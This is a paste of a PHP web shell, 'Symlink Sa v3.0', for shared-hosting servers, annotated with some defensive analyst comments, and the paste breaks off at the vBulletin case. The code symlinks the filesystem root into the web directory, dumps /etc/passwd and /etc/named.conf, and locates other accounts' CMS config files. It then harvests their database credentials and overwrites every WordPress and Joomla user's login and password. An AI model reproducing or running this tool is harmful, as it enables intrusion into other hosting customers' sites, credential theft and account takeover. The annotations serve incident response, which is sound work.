cesabot

Untitled

Aug 5th, 2017
  1. <?php
  2.  
  3. /*
  4.  
  5. .d8888. d88888b .o88b. db d8b db .o88b. .d88b. .88b d88.
  6. 88' YP 88' d8P Y8 88 I8I 88 d8P Y8 .8P Y8. 88'YbdP`88
  7. `8bo. 88ooooo 8P 88 I8I 88 8P 88 88 88 88 88
  8. `Y8b. 88~~~~~ 8b C8888D Y8 I8I 88 8b 88 88 88 88 88
  9. db 8D 88. Y8b d8 `8b d8'8b d8' db Y8b d8 `8b d8' 88 88 88
  10. `8888Y' Y88888P `Y88P' `8b8' `8d8' VP `Y88P' `Y88P' YP YP YP
  11.  
  12.  
  13. author..............: s3n4t00r
  14. home................:
  15. twitter.............: @s3n4t00r
  16. name tools..........: Symlink Sa v3.0
  17.  
  18. */
  19. // Analyst note: this is a PHP web shell (self-titled "Symlink Sa v3.0") built for shared-hosting servers.
  20. // Its presence under a web root means that account is already compromised; the rest of the file tries to
  21. // reach other accounts' files through symlinks, so scope the response to the whole server, not one site.
  22. set_time_limit(0); // removes PHP's execution time limit for this request
  23. error_reporting(0); // turns PHP error reporting off for this request
  24. // $pageURL: http:// + SERVER_NAME + REQUEST_URI with the last '/'-separated piece stripped by str_replace.
  25. // Later code appends /sym/root/home/<user>/... and probes it with get_headers(), i.e. the server requests its own URLs; those self-requests should appear in the web server's access log.
  26. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  27. $u = explode("/",$pageURL );
  28. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  29. // $pageFTP: same construction with ftp:// and a hard-coded /public_html/ segment; used for the "FTP" links in the passwd case.
  30. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  31. $u = explode("/",$pageFTP );
  32. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  33.  
  34. ?>
  35. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  36. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  37.  
  38. <html xmlns="http://www.w3.org/1999/xhtml">
  39.  
  40. <head>
  41. <title>Symlink_Sa 3.0</title>
  42.  
  43. <style type="text/css">
  44.  
  45. html,body {
  46. margin: 0;
  47. padding: 0;
  48. outline: 0;
  49. }
  50. a{
  51.  
  52. font-size: 13px;
  53.  
  54. }
  55.  
  56.  
  57. body {
  58. direction: ltr;
  59. background-color:#F4F4F4;
  60. color: rgb(153, 153, 153);
  61. text-align: center
  62. }
  63.  
  64.  
  65.  
  66. input,textarea,select{
  67. font-weight: bold;
  68. color: #000000;
  69. }
  70.  
  71. input,textarea,select:hover{
  72. box-shadow: 0px 0px 4px #AAAAAA;
  73. }
  74.  
  75.  
  76. .hedr {
  77. font-family: Tahoma, Arial, sans-serif ;
  78. font-size: 22px;
  79.  
  80.  
  81. }
  82.  
  83. .cont a{
  84.  
  85. text-decoration: none;
  86. color:rgb(153, 153, 153);
  87. font-family: Tahoma, Arial, sans-serif ;
  88. font-size: 16px;
  89. text-shadow: 0px 0px 3px ;
  90. }
  91.  
  92. .cont a:hover{
  93.  
  94.  
  95. color: #EEEEEE ;
  96. text-shadow:0px 0px 3px #000000 ;
  97.  
  98.  
  99. }
  100.  
  101. .tmp tr td{
  102.  
  103. border: solid 1px #BBBBBB;
  104.  
  105. padding: 2px ;
  106. font-size: 13px;
  107. }
  108.  
  109. .tmp tr td a {
  110. text-decoration: none;
  111.  
  112.  
  113.  
  114. }
  115.  
  116. .foter{
  117. font-size: 9pt;
  118. color: #AAAAAA ;
  119. text-align: center
  120. }
  121.  
  122. .tmp tr td:hover{
  123.  
  124. box-shadow: 0px 0px 4px #888888;
  125.  
  126. }
  127. .fot{
  128.  
  129. font-family:Tahoma, Arial, sans-serif;
  130.  
  131. font-size: 11pt;
  132. }
  133. .for a : hover{
  134.  
  135. text-shadow: 0px 0px 1px #3366FF;
  136.  
  137. }
  138.  
  139.  
  140. .ir {
  141. color: #FF0000;
  142. }
  143.  
  144.  
  145.  
  146. </style>
  147.  
  148. </head>
  149.  
  150. <body>
  151.  
  152. <div class='all'>
  153.  
  154.  
  155. <?php
  156. // Setup stage: runs on every request, before the ?sws= dispatcher. Paths are relative, so normally the script's own directory.
  157. @mkdir('sym',0777);
  158. $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  159. $f =@fopen ('sym/.htaccess','w');
  160. fwrite($f , $htcs);
  161. // The .htaccess above requests "Options all" and maps .php/.html to text/plain, presumably so config files reached via the symlink come back as source.
  162. // Hardening: keep Options and FileInfo out of AllowOverride for user directories, and consider symlink in PHP disable_functions plus open_basedir.
  163. // Config files readable only by their owning account (possible when PHP runs as that account) cannot be served through another account's symlink.
  164. @symlink("/","sym/root");
  165. // IoC: sym/root is a symlink to the filesystem root inside a web-served directory; look for symlinks under document roots that resolve outside the owning account.
  166. $pg = basename(__FILE__);
  167. // $pg is this script's own file name; it is used as the form action of the "mass" forms further down.
  168. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
  169. // Other artifacts this file creates beside itself: sym1/ (with its own .htaccess), named.txt, passwd.txt, joomla.txt, wp.txt, vb.txt.
  170. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
  171. // Menu: each link only sets the sws parameter, so requests carrying ?sws=sym|sec|file|passwd|read|joomla|wp|vb|help are a log-search pivot.
  172. echo '<div class="cont">
  173.  
  174. [<a href="?"> Home </a>]
  175.  
  176. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  177.  
  178. [<a href="?sws=sec"> Domains & Script </a>]
  179.  
  180. [ <a href="?sws=file"> Symlink File </a>]
  181.  
  182. [<a href="?sws=passwd"> Symlink Bypass </a>]
  183.  
  184. <br /><br />
  185.  
  186. [ <a href="?sws=read"> Bypass Read </a>]
  187.  
  188. [ <a href="?sws=joomla"> Mass Joomla </a>]
  189.  
  190. [ <a href="?sws=wp"> Mass WordPress </a>]
  191.  
  192. [ <a href="?sws=vb"> Mass vBulletin </a>]
  193.  
  194. [ <a href="?sws=help"> Help </a>]
  195.  
  196. <br /><br /><br />
  197.  
  198.  
  199.  
  200.  
  201.  
  202.  
  203. </div>';
  204. // Dispatcher follows. Triage summary of its cases: sec/sym list domains from /etc/named.conf (or named.txt) and map them to accounts via /etc/valiases ownership; file makes an arbitrary symlink under sym1/; read/passwd dump /etc/named.conf and /etc/passwd; joomla/wp run UPDATEs with no WHERE clause that set every user row to the login 'sec-w.com'; vb overwrites the vBulletin FAQ template with PHP. After cleanup, rotate DB credentials and audit CMS user tables and templates on every account.
  205. if(isset($_REQUEST['sws']))
  206. {
  207.  
  208. switch ($_REQUEST['sws'])
  209. {
  210.  
  211.  
  212.  
  213.  
  214.  
  215. /// Domains + Scripts ///
  216.  
  217. case 'sec':
  218.  
  219. if(!@is_file('named.txt')){
  220.  
  221. $d00m = @file("/etc/named.conf");
  222.  
  223. }else{
  224.  
  225. $d00m = @file("named.txt");
  226.  
  227.  
  228. }
  229. if(!$d00m)
  230. {
  231.  
  232. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  233. }
  234. else
  235.  
  236. {
  237. echo "<div class='tmp'>
  238. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  239. foreach($d00m as $dom){
  240.  
  241. flush();
  242. flush();
  243.  
  244.  
  245.  
  246. if(eregi("zone",$dom)){
  247.  
  248. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  249.  
  250. flush();
  251.  
  252. if(@strlen(trim($domsws[1][0])) > 2){
  253.  
  254. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  255.  
  256. ///////////////////////////////////////////////////////////////////////////////////
  257.  
  258. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  259. $wpp=@get_headers($wpl);
  260. $wp=$wpp[0];
  261.  
  262. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  263. $wpp2=@get_headers($wp2);
  264. $wp12=$wpp2[0];
  265.  
  266. ///////////////////////////////
  267.  
  268. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  269. $joo=@get_headers($jo1);
  270. $jo=$joo[0];
  271.  
  272.  
  273. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  274. $joo2=@get_headers($jo2);
  275. $jo12=$joo2[0];
  276.  
  277. ////////////////////////////////
  278.  
  279. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  280. $vbb=@get_headers($vb1);
  281. $vb=$vbb[0];
  282.  
  283. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  284. $vbb2=@get_headers($vb2);
  285. $vb12=$vbb2[0];
  286.  
  287. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  288. $vbb3=@get_headers($vb3);
  289. $vb13=$vbb3[0];
  290.  
  291. /////////////////
  292.  
  293. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  294. $whh2= @get_headers($wh1);
  295. $wh=$whh2[0];
  296.  
  297. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  298. $whh2= @get_headers($wh2);
  299. $wh12=$whh2[0];
  300.  
  301. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  302. $whh3= @get_headers($wh3);
  303. $wh13=$whh3[0];
  304.  
  305. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  306. $whh5= @get_headers($wh5);
  307. $wh15=$whh5[0];
  308.  
  309. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  310. $whh4= @get_headers($wh4);
  311. $wh14=$whh4[0];
  312.  
  313.  
  314.  
  315. ////////////////////////////////////////////////////////////////////////////////
  316.  
  317. ////////// Wordpress ////////////
  318.  
  319. $pos = strpos($wp, "200");
  320. $config="&nbsp;";
  321.  
  322. if (strpos($wp, "200") == true )
  323. {
  324. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  325. }
  326. elseif (strpos($wp12, "200") == true)
  327. {
  328. $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  329. }
  330.  
  331. ///////////WHMCS////////
  332.  
  333. elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
  334. {
  335. $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  336.  
  337. }
  338. elseif (strpos($wh12, "200") == true)
  339. {
  340. $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  341. }
  342.  
  343. elseif (strpos($wh13, "200") == true)
  344. {
  345. $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  346.  
  347. }
  348.  
  349. ///////// Joomla to 4 ///////////
  350.  
  351. elseif (strpos($jo, "200") == true)
  352. {
  353. $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  354. }
  355.  
  356. elseif (strpos($jo12, "200") == true)
  357. {
  358. $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  359. }
  360.  
  361. //////////vBulletin to 4 ///////////
  362.  
  363. elseif (strpos($vb, "200") == true)
  364. {
  365. $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  366. }
  367.  
  368. elseif (strpos($vb12, "200") == true)
  369. {
  370. $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  371. }
  372.  
  373. elseif (strpos($vb13, "200") == true)
  374. {
  375. $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  376. }
  377.  
  378. else
  379. {
  380. continue;
  381. }
  382. flush();
  383. flush();
  384.  
  385. /////////////////////////////////////////////////////////////////////////////////////
  386.  
  387.  
  388.  
  389. $site = $user['name'] ;
  390.  
  391.  
  392.  
  393. flush();
  394.  
  395. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  396. <td>".$config."</td></tr>"; flush();
  397.  
  398. }
  399. }
  400. }
  401. }
  402.  
  403.  
  404.  
  405.  
  406. break;
  407.  
  408.  
  409. /// user + domine + symlink ///
  410.  
  411. case 'sym':
  412.  
  413. if(!is_file('named.txt')){
  414.  
  415. $d00m = @file("/etc/named.conf");
  416.  
  417. }else{
  418.  
  419. $d00m = @file("named.txt");
  420.  
  421.  
  422. }
  423. if(!$d00m)
  424. {
  425.  
  426. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  427. }
  428. else
  429.  
  430. {
  431. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  432. foreach($d00m as $dom){
  433.  
  434. if(eregi("zone",$dom)){
  435.  
  436. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  437.  
  438. flush();
  439.  
  440. if(strlen(trim($domsws[1][0])) > 2){
  441.  
  442. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  443.  
  444. flush();
  445.  
  446.  
  447.  
  448. $site = $user['name'] ;
  449.  
  450.  
  451. @symlink("/","sym/root");
  452.  
  453. $site = $domsws[1][0];
  454.  
  455. $ir = 'ir';
  456.  
  457. $il = 'il';
  458.  
  459. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  460. {
  461. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  462. }
  463.  
  464.  
  465. echo "
  466. <tr>
  467.  
  468. <td>
  469. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  470. </td>
  471.  
  472.  
  473. <td>
  474. ".$user['name']."
  475. </td>
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482. <td>
  483. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  484. </td>
  485.  
  486.  
  487. </tr></div> ";
  488.  
  489.  
  490. flush();
  491. flush();
  492.  
  493. }
  494. }
  495. }
  496. }
  497.  
  498.  
  499.  
  500.  
  501. break;
  502.  
  503.  
  504. /// file symlink ///
  505.  
  506. case 'file':
  507.  
  508. echo'
  509. The file path to symlink
  510.  
  511. <br /><br />
  512. <form method="post">
  513. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  514. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  515. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  516.  
  517.  
  518.  
  519. </form>
  520. ';
  521.  
  522. $pfile = $_POST['file'];
  523. $symfile = $_POST['symfile'];
  524. $symlink = $_POST['symlink'];
  525.  
  526. if ($symlink)
  527. {
  528.  
  529.  
  530. @mkdir('sym1',0777);
  531. $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  532. $f =@fopen ('sym1/.htaccess','w');
  533. @fwrite($f , $c);
  534.  
  535. @symlink("$pfile","sym1/$symfile");
  536.  
  537. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  538.  
  539. }
  540.  
  541.  
  542.  
  543. break;
  544.  
  545. /// bypass read
  546.  
  547. case 'read':
  548.  
  549. echo "read /etc/named.conf";
  550. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  551. flush();
  552. flush();
  553.  
  554.  
  555. $file = '/etc/named.conf';
  556.  
  557.  
  558. $r3ad = @fopen($file, 'r');
  559. if ($r3ad){
  560. $content = @fread($r3ad, @filesize($file));
  561. echo "".htmlentities($content)."";
  562. }
  563. else if (!$r3ad)
  564. {
  565. $r3ad = @show_source($file) ;
  566. }
  567. else if (!$r3ad)
  568. {
  569. $r3ad = @highlight_file($file);
  570. }
  571. else if (!$r3ad)
  572. {
  573. $sm = @symlink($file,'sym.txt');
  574.  
  575.  
  576. if ($sm){
  577. $r3ad = @fopen('sym/sym.txt', 'r');
  578. $content = @fread($r3ad, @filesize($file));
  579. echo "".htmlentities($content)."";
  580.  
  581. }
  582. }
  583.  
  584.  
  585.  
  586. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
  587.  
  588.  
  589. if(isset($_GET['save'])){
  590.  
  591.  
  592. $cont = stripcslashes($_POST['file']);
  593.  
  594. $f = fopen('named.txt','w');
  595.  
  596. $w = fwrite($f,$cont);
  597.  
  598. if($w){
  599.  
  600. echo '<br />save has been successfully';
  601.  
  602. }
  603.  
  604. fclose($f);
  605.  
  606.  
  607.  
  608.  
  609. }
  610.  
  611.  
  612.  
  613. break;
  614.  
  615. // passwd
  616.  
  617. case 'passwd':
  618.  
  619. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  620.  
  621.  
  622. $cont = stripcslashes($_POST['file']);
  623.  
  624. if(!file_exists('passwd.txt')){
  625.  
  626. $f = @fopen('passwd.txt','w');
  627.  
  628. $w = @fwrite($f,$cont);
  629.  
  630. fclose($f);
  631. }
  632. if($w or @filesize('passwd.txt') > 0){
  633. // * SHOW * //
  634.  
  635. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  636. flush();
  637.  
  638. $fil3 = file('passwd.txt');
  639.  
  640. foreach ($fil3 as $f){
  641.  
  642. $u=explode(':', $f);
  643. $user = $u['0'];
  644.  
  645.  
  646.  
  647. echo "
  648. <tr>
  649.  
  650.  
  651.  
  652. <td width='15%'>
  653. $user
  654. </td>
  655.  
  656.  
  657.  
  658.  
  659.  
  660.  
  661. <td width='10%'>
  662. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  663. </td>
  664.  
  665. <td width='10%'>
  666. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  667. </td>
  668.  
  669.  
  670.  
  671. </tr></div> ";
  672.  
  673.  
  674. flush();
  675. flush();
  676.  
  677.  
  678. }
  679.  
  680.  
  681.  
  682.  
  683.  
  684.  
  685. die ("</tr></div>");
  686.  
  687.  
  688. }
  689.  
  690.  
  691.  
  692.  
  693.  
  694. }
  695.  
  696.  
  697.  
  698. echo "read /etc/passwd";
  699. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  700. flush();
  701.  
  702. $file = '/etc/passwd';
  703.  
  704.  
  705. $r3ad = @fopen($file, 'r');
  706. if ($r3ad){
  707. $content = @fread($r3ad, @filesize($file));
  708. echo "".htmlentities($content)."";
  709. }
  710. elseif(!$r3ad)
  711. {
  712. $r3ad = @show_source($file) ;
  713. }
  714. elseif(!$r3ad)
  715. {
  716. $r3ad = @highlight_file($file);
  717. }
  718. elseif(!$r3ad)
  719. {
  720.  
  721. for($uid=0;$uid<1000;$uid++){
  722. $ara = posix_getpwuid($uid);
  723. if (!empty($ara)) {
  724. while (list ($key, $val) = each($ara)){
  725. print "$val:";
  726. }
  727. print "\n";
  728. }
  729.  
  730. }
  731.  
  732. }
  733.  
  734.  
  735. flush();
  736.  
  737.  
  738. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  739. flush();
  740.  
  741. break;
  742.  
  743.  
  744.  
  745. case 'joomla':
  746.  
  747. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  748.  
  749.  
  750. if(isset($_POST['s'])){
  751.  
  752. $file = @file_get_contents('joomla.txt');
  753.  
  754. $ex = explode("\n",$file);
  755.  
  756. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  757. flush();
  758.  
  759.  
  760. foreach ($ex as $exp){
  761.  
  762. $es = explode("||",$exp);
  763.  
  764. $config = $es[0];
  765.  
  766. $domin = $es[1];
  767.  
  768. $domins = trim($domin).'';
  769.  
  770. $readconfig = @file_get_contents(trim($config));
  771.  
  772. if(ereg('JConfig',$readconfig)){
  773.  
  774.  
  775.  
  776. $pass = ex($readconfig,'$password = \'',"';");
  777.  
  778. $userdb = ex($readconfig,'$user = \'',"';");
  779.  
  780. $db = ex($readconfig,'$db = \'',"';");
  781.  
  782. $fix = ex($readconfig,'$dbprefix = \'',"';");
  783.  
  784. $tab = $fix.'users';
  785.  
  786.  
  787. $con = @mysql_connect('localhost',$userdb,$pass);
  788.  
  789. $db = @mysql_select_db($db,$con);
  790.  
  791. $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
  792.  
  793.  
  794. $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  795.  
  796.  
  797. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
  798.  
  799. $domins = trim($domin).'';
  800.  
  801. echo "<tr>
  802. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  803. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  804. flush();
  805.  
  806.  
  807.  
  808. }else{
  809.  
  810. echo "<tr>
  811. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  812. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  813. flush();
  814.  
  815. }
  816.  
  817. }
  818.  
  819.  
  820.  
  821.  
  822.  
  823.  
  824.  
  825.  
  826.  
  827. die();
  828.  
  829. }
  830.  
  831. if(!is_file('named.txt')){
  832.  
  833. $d00m = @file("/etc/named.conf");
  834.  
  835. flush();
  836.  
  837.  
  838. }else{
  839.  
  840. $d00m = file("named.txt");
  841.  
  842.  
  843. }
  844. if(!$d00m)
  845. {
  846.  
  847. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  848. }
  849. else
  850.  
  851. {
  852. echo "<div class='tmp'>
  853. <form method='POST' action='$pg?sws=joomla'>
  854. <input type='submit' value='Mass ching Admin' />
  855. <input type='hidden' value='1' name='s' />
  856. </form><br /><br />
  857. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  858.  
  859. $f = fopen('joomla.txt','w');
  860.  
  861. foreach($d00m as $dom){
  862.  
  863. if(eregi("zone",$dom)){
  864.  
  865. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  866.  
  867. if(strlen(trim($domsws[1][0])) > 2){
  868.  
  869. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  870.  
  871. ///////////////////////////////////////////////////////////////////////////////////
  872.  
  873. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  874. $wpp=get_headers($wpl);
  875. $wp=$wpp[0];
  876.  
  877. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  878. $wpp2=get_headers($wp2);
  879. $wp12=$wpp2[0];
  880.  
  881. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  882. $wpp3=get_headers($wp3);
  883. $wp13=$wpp3[0];
  884.  
  885.  
  886. ////////// joomla ////////////
  887.  
  888. $pos = strpos($wp, "200");
  889. $config="&nbsp;";
  890.  
  891. if (strpos($wp, "200") == true )
  892. {
  893. $config= $wpl;
  894. }
  895. elseif (strpos($wp12, "200") == true)
  896. {
  897. $config= $wp2;
  898. }
  899. elseif (strpos($wp13, "200") == true)
  900. {
  901. $config= $wp3;
  902. }
  903. else
  904. {
  905. continue;
  906.  
  907. }
  908. flush();
  909.  
  910. /////////////////////////////////////////////////////////////////////////////////////
  911.  
  912. $dom = $domsws[1][0];
  913.  
  914. $w = fwrite($f,"$config||$dom \n");
  915. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  916.  
  917.  
  918. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  919. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  920.  
  921.  
  922.  
  923.  
  924.  
  925. flush();
  926.  
  927.  
  928. }
  929. }
  930. }
  931. }
  932.  
  933.  
  934. break;
  935.  
  936. case 'wp':
  937.  
  938. ############################ index #########################3
  939.  
  940.  
  941.  
  942.  
  943.  
  944.  
  945. ######## admin ##########33
  946.  
  947. if(isset($_POST['s'])){
  948.  
  949. $file = @file_get_contents('wp.txt');
  950.  
  951. $ex = explode("\n",$file);
  952.  
  953. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  954. flush();
  955. flush();
  956.  
  957.  
  958. foreach ($ex as $exp){
  959.  
  960. $es = explode("||",$exp);
  961.  
  962. $config = $es[0];
  963.  
  964. $domin = $es[1];
  965.  
  966. $domins = trim($domin).'';
  967.  
  968. $readconfig = @file_get_contents(trim($config));
  969.  
  970. if(ereg('wp-settings.php',$readconfig)){
  971.  
  972.  
  973.  
  974. $pass = ex($readconfig,"define('DB_PASSWORD', '","');");
  975.  
  976. $userdb = ex($readconfig,"define('DB_USER', '","');");
  977.  
  978. $db = ex($readconfig,"define('DB_NAME', '","');");
  979.  
  980. $fix = ex($readconfig,'$table_prefix = \'',"';");
  981.  
  982. $tab = $fix.'users';
  983.  
  984. $con = @mysql_connect('localhost',$userdb,$pass);
  985.  
  986. $db = @mysql_select_db($db,$con);
  987.  
  988. $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  989.  
  990. $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  991.  
  992.  
  993.  
  994. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  995.  
  996. else
  997.  
  998. {
  999.  
  1000. $r = '<b style="color:red">failed</b>';
  1001.  
  1002. }
  1003.  
  1004. $domins = trim($domin).'';
  1005.  
  1006. echo "<tr>
  1007. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1008. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1009.  
  1010. flush();
  1011. flush();
  1012.  
  1013.  
  1014.  
  1015.  
  1016.  
  1017.  
  1018. }else{
  1019.  
  1020. echo "<tr>
  1021. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1022. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1023.  
  1024. flush();
  1025. flush();
  1026.  
  1027. }
  1028.  
  1029. }
  1030.  
  1031.  
  1032.  
  1033.  
  1034.  
  1035.  
  1036.  
  1037.  
  1038.  
  1039.  
  1040. die();
  1041.  
  1042. }
  1043.  
  1044. if(!is_file('named.txt')){
  1045.  
  1046. $d00m = @file("/etc/named.conf");
  1047.  
  1048. }else{
  1049.  
  1050. $d00m = @file("named.txt");
  1051.  
  1052.  
  1053. }
  1054. if(!$d00m)
  1055. {
  1056.  
  1057. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1058. }
  1059. else
  1060.  
  1061. {
  1062. echo "<div class='tmp'>
  1063. <form method='POST' action='$pg?sws=wp'>
  1064. <input type='submit' value='Mass Change Admin' />
  1065. <input type='hidden' value='1' name='s' />
  1066. </form>
  1067. <br /><br />
  1068. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1069.  
  1070. flush();
  1071. flush();
  1072.  
  1073. $f = fopen('wp.txt','w');
  1074.  
  1075. foreach($d00m as $dom){
  1076.  
  1077. if(eregi("zone",$dom)){
  1078.  
  1079. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1080.  
  1081. if(strlen(trim($domsws[1][0])) > 2){
  1082.  
  1083. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1084.  
  1085. ///////////////////////////////////////////////////////////////////////////////////
  1086.  
  1087. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1088. $wpp=get_headers($wpl);
  1089. $wp=$wpp[0];
  1090.  
  1091. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1092. $wpp2=get_headers($wp2);
  1093. $wp12=$wpp2[0];
  1094.  
  1095. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1096. $wpp3=get_headers($wp3);
  1097. $wp13=$wpp3[0];
  1098.  
  1099.  
  1100. ////////// wp ////////////
  1101.  
  1102. $pos = strpos($wp, "200");
  1103. $config="&nbsp;";
  1104.  
  1105. if (strpos($wp, "200") == true )
  1106. {
  1107. $config= $wpl;
  1108. }
  1109. elseif (strpos($wp12, "200") == true)
  1110. {
  1111. $config= $wp2;
  1112. }
  1113. elseif (strpos($wp13, "200") == true)
  1114. {
  1115. $config= $wp3;
  1116. }
  1117. else
  1118. {
  1119. continue;
  1120.  
  1121. }
  1122. flush();
  1123.  
  1124. /////////////////////////////////////////////////////////////////////////////////////
  1125.  
  1126. $dom = $domsws[1][0];
  1127.  
  1128. $w = fwrite($f,"$config||$dom \n");
  1129. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1130.  
  1131.  
  1132. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1133. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1134. flush();
  1135. flush();
  1136.  
  1137.  
  1138.  
  1139.  
  1140.  
  1141. flush();
  1142.  
  1143.  
  1144. }
  1145. }
  1146. }
  1147. }
  1148.  
  1149.  
  1150. break;
  1151.  
  1152.  
  1153. case 'vb':
  1154.  
  1155.  
